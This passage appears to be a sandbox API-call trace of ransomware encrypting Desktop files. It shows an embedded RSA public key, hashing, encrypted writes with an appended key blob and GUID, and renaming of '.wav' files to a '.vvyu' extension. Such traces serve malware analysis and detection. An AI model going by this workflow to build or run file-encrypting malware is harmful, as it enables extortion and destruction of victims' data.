KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.340] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.340] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.341] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.341] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.341] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.341] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.341] GetLastError () returned 0x0 [0188.341] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.341] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.341] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.341] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.341] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3010) returned 0x2ae3ea0 [0188.342] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae25c0 [0188.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d868 [0188.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2608 [0188.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d880 [0188.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8f8 [0188.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d958 [0188.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d910 [0188.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2f5b18 [0188.343] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2f5b18, Size=0x218) returned 0x2ae6eb8 [0188.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2ae70d8 [0188.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae70d8 | out: hHeap=0x2c0000) returned 1 [0188.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d958 [0188.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0188.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d910 [0188.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d8f8 [0188.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0188.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0188.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6eb8 | out: hHeap=0x2c0000) returned 1 [0188.345] GetCurrentThreadId () returned 0x5d8 [0188.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee380 [0188.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.346] GetCurrentThreadId () returned 0x5d8 [0188.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d958 [0188.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8f8 [0188.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0188.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d910 [0188.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8e0 [0188.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d970 [0188.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0188.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d940 [0188.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d928 [0188.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d988 [0188.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 [0188.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d928 [0188.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0188.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d8f8 [0188.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2ae6eb8 [0188.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2ae70c8 [0188.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2ae72e0 [0188.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae70c8 | out: hHeap=0x2c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae72e0 | out: hHeap=0x2c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2608 | out: hHeap=0x2c0000) returned 1 [0188.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6eb8 | out: hHeap=0x2c0000) returned 1 [0188.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.356] WriteFile (in: hFile=0x584, lpBuffer=0x2ae3ea0*, nNumberOfBytesToWrite=0x300a, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae3ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x300a, lpOverlapped=0x0) returned 1 [0188.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.357] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x300f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.357] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2ae3ea0 [0188.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ae3ea0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2ae42d0 [0188.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.359] WriteFile (in: hFile=0x584, lpBuffer=0x2ae42d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae42d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae42d0 | out: hHeap=0x2c0000) returned 1 [0188.359] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.359] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.359] CloseHandle (hObject=0x584) returned 1 [0188.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0188.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2ae3ea0 [0188.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.361] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\i_u5ln.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\i_u5ln.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\i_u5ln.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\i_u5ln.wav.vvyu")) returned 1 [0188.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.364] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.367] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e0b920, ftCreationTime.dwHighDateTime=0x1d89fd9, ftLastAccessTime.dwLowDateTime=0x184a2940, ftLastAccessTime.dwHighDateTime=0x1d8a226, ftLastWriteTime.dwLowDateTime=0x184a2940, ftLastWriteTime.dwHighDateTime=0x1d8a226, nFileSizeHigh=0x0, nFileSizeLow=0x80da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkGJiQ3H.wav", cAlternateFileName="")) returned 1 [0188.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2608 [0188.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ed40 [0188.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2608 | out: hHeap=0x2c0000) returned 1 [0188.368] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\jkGJiQ3H.wav") returned=".wav" [0188.368] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\jkGJiQ3H.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\jkgjiq3h.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 